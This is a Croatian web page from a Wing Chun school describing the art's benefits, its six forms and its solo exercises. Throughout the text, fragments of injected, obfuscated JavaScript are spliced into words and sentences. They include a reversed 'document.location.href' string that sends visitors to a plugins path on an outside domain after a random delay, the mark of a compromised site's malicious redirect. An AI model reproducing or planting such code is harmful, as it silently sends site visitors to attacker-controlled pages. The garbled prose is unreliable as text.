Učenje Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}lutkaUčenje Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unaandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Wing Chun pripada najznačajnijim borilačkim vještinama na svijetu. Na samom početku učenik uči zaštititi sebe. Upravo andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to zaštititi sebe je od elementarnog značaja kako bi kroz vlastitu pokretljivost reflexe i samopouzdanje bili u stanju oduprijeti se i tijelesno jačem protivniku

Wing Chun je jedan od najučinkovitijih borilačkih sistema koji posandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tojeandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

  • Lako je savladiv za žene i muškarce
  • podučavan od strane stručnjaka
  • Podiže kvalitetu života
  • Vježba reflekse
  • Daje koordinaciju i sposobnost
  • Povečava kondiciju

Wing chun sadrži 6 formi koje se vježbajuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

  • Siu Lim Tao
  • Chum Kiu
  • Biu Tze
  • Mok Jong
  • Baat Jam Dao
  • Look Dim Boon Kwan

Kako ljudsko tijelo samo po sebi nije prilagođeno Wing Chunu, mi ga moramo prilagoditi tj napraviti sposobnim za vježbanje.
To ćemo postići kroz vrlo bitan dio u Wing Chunu, a andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to su solo vježbe.
Solo vježbe se sasandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toje od pokreta tijela koji se izvode na mjestu te pokreta tijela u kretanju.
One su same po sebi vrlo teške jer zahtjevaju određenu vrstu kondicije u ramenima, te zahtjevaju da
tijelo nakon svakog izvedenog pokreta bude u potpunom stabilitetu.
Kroz solo vježbe postajemo svjesni svojih pokreta te nedostataka na kojem svaki vježbač treba raditi opušteno i bez opterečenja.

Samostalne vježbeandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Benefitiandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}:

  • poboljšanje andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}točnosti pokreta
  • poboljšanje ravnoteže i koordinacije
  • povećanje brzine kretnji tijela 
  • povećanje (fokusiranje) snage (pokreta) u kretnji
  • poboljšanje tjelesne kondicije i izdržljivosti

 andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Chiu´s Wing Chun Croatia